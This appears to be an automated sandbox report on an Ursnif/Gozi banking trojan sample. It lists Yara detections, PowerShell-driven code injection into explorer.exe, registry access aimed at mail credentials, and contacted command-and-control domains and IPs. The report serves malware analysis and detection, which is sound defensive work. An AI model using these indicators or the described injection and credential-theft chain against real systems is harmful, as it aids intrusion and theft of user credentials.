Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F88B98 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_00F88B98
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_1000166F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY
Behavior Graph (ID: 343316, Sample: out.dll, Start date: 22/01/2021, Architecture: WINDOWS, Score: 100)

Process tree recovered from the graph (node counters and colour coding are not reproduced):

  • out.dll (sample); resolves resolver1.opendns.com; signatures: Multi AV Scanner detection for domain / URL, Found malware configuration, Malicious sample detected (through community Yara rule), 10 other signatures
    • mshta.exe (started); signature: Suspicious powershell command line found
      • powershell.exe (started); dropped C:\Users\user\AppData\Local\...\ntdrbunx.0.cs (UTF-8) and C:\Users\user\AppData\...\f1lrerxf.cmdline (UTF-8); signatures: Injects code into the Windows Explorer (explorer.exe), Writes to foreign memory regions, Modifies the context of a thread in another process (thread injection), 2 other signatures
        • explorer.exe (injected); contacts c56.lepini.at, app.crasa.at 128.14.142.220 (49758, 80; ZNETUS, United States), api3.lepini.at; signatures: Tries to steal Mail credentials (via file access), Changes memory attributes in foreign processes to executable or writable, Writes to foreign memory regions, 5 other signatures
          • RuntimeBroker.exe (injected)
          • RuntimeBroker.exe (injected)
          • cmd.exe (started)
        • csc.exe (started); dropped C:\Users\user\AppData\Local\...\f1lrerxf.dll (PE32)
          • cvtres.exe (started)
        • csc.exe (started); dropped C:\Users\user\AppData\Local\...\ntdrbunx.dll (PE32)
          • cvtres.exe (started)
        • conhost.exe (started)
    • loaddll32.exe (started); signatures: Detected Gozi e-Banking trojan, Writes to foreign memory regions, Allocates memory in foreign processes, 4 other signatures
      • control.exe (started); signatures: Changes memory attributes in foreign processes to executable or writable, Allocates memory in foreign processes, Maps a DLL or memory area into another process
        • rundll32.exe (started)
    • iexplore.exe (started)
      • iexplore.exe (started); contacts api10.laptok.at 45.138.24.6 (49744, 49745, 49746; SPECTRAIPSpectraIPBVNL, Turkey)
      • iexplore.exe (started)
      • iexplore.exe (started)

Contacted Public IPs

IP              Domain   Country        ASN    ASN Name                Malicious
128.14.142.220  unknown  United States  21859  ZNETUS                  false
45.138.24.6     unknown  Turkey         62068  SPECTRAIPSpectraIPBVNL  true

Contacted Domains

Name                   IP               Active
app.crasa.at           128.14.142.220   true
c56.lepini.at          45.138.24.6      true
resolver1.opendns.com  208.67.222.222   true
api3.lepini.at         45.138.24.6      true
api10.laptok.at        45.138.24.6      true